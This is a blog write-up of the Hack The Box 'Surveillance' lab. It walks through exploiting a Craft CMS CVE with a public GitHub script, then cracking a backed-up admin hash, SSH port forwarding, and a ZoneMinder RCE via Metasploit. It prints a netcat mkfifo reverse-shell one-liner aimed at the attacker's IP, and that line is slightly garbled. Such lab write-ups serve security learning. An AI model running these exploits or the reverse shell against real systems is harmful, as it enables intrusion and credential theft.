Open in app

Sign in

Write

Sign in

Shoaib Ahmad
4 min readApr 28, 2024

Surveillance (Hack The Box)

This is one of my first machines pwned on the Hack The Box! It was really exciting and painful to pwn this machine. Thank you HTB community for your valuable time and hints.

The machine goes over a heavy enumeration that leads to exploiting ‘Craft CMS’ to get a low-level shell on the server. Privilege escalation was performed by doing a local port-forward with ssh exploiting ‘ZoneMinder’.

Visiting the IP in Firefox It was trying to communicate with the domain surveillance.htb. I mapped the domain to the machine’s IP in the/etc/hosts file.

sudo nano /etc/hosts

I scanned the IP using nmap and got back only two ports which was good.

I visited the surveilance.htb and got webpage about home security. The company offers Cameras, Intrusion, Perimeter Security, Access Control & Intercom services.

After analyzing the site for quite while of time, i found the web page was using ‘Craft CMS’. I did a keyword search in the view page source ctrl-f for “CMS” and came across some version information.

Exploitation

After searching on NVD and ExploitDB, I found an exploit on GitHub.

sudo git clone https://github.com/Faelian/CraftCMS_CVE-2023-41892
cd CraftCMS_CVE-2023–41892
python3 craft-cms.py http://surveillance.htb/

I decided to run another reverse shell back to my machine.

On my attacker machine:

nc -nlvp 443

On the target machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your IP here> 1234 >/tmp/f/usr/bin/script -qc /bin/bash /dev/null

Now that i got access to the machine as www-data, i had to search and enumerate to increase my privileges.

After searching the machine from dawn to dusk i found something interesting in backup directory which was database file. It was credentials of the admin named matthew.

After cracking the hash with hashcat tool i found the pass for the admin matthew.

Now connected to the machine using matthew credentials.

sudo ssh -oHostKeyAlgorithms=+ssh-dss matthew@10.10.11.245

Found the user flag as soon as logged in matthew

I ran linpeas and revisited the section where it highlighted open active ports and port 8080 was interesting to me.

To access this port I needed to do an SSH Local Port Forward. A local Port redirects traffic from a local port on the client machine to a specified port on a remote server through an SSH connection.

On my attack machine I ran:

ssh -L 2222:127.0.0.1:8080 matthew@10.10.11.245

Visited my localhost IP in a browser on port 2222 and was presented with a ZoneMinder login page.

As i had found credentials for zoneminder along with matthew’s, i can use it here.

I googled for any exploits out there available for ZoneMinder and came across yet another RCE-related exploit.

Found Python script is an exploit for (CVE-2023–26035), which is an unauthenticated Remote Code Execution (RCE) vulnerability in ZoneMinder Snapshots. Which was also present in metasploit which i used for RCE.

Andd thats it, pwned!!

Htb
Surveillance
Pwned
Ctf
Flags
Shoaib Ahmad
Shoaib Ahmad

Written by Shoaib Ahmad

0 Followers
1 Following

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams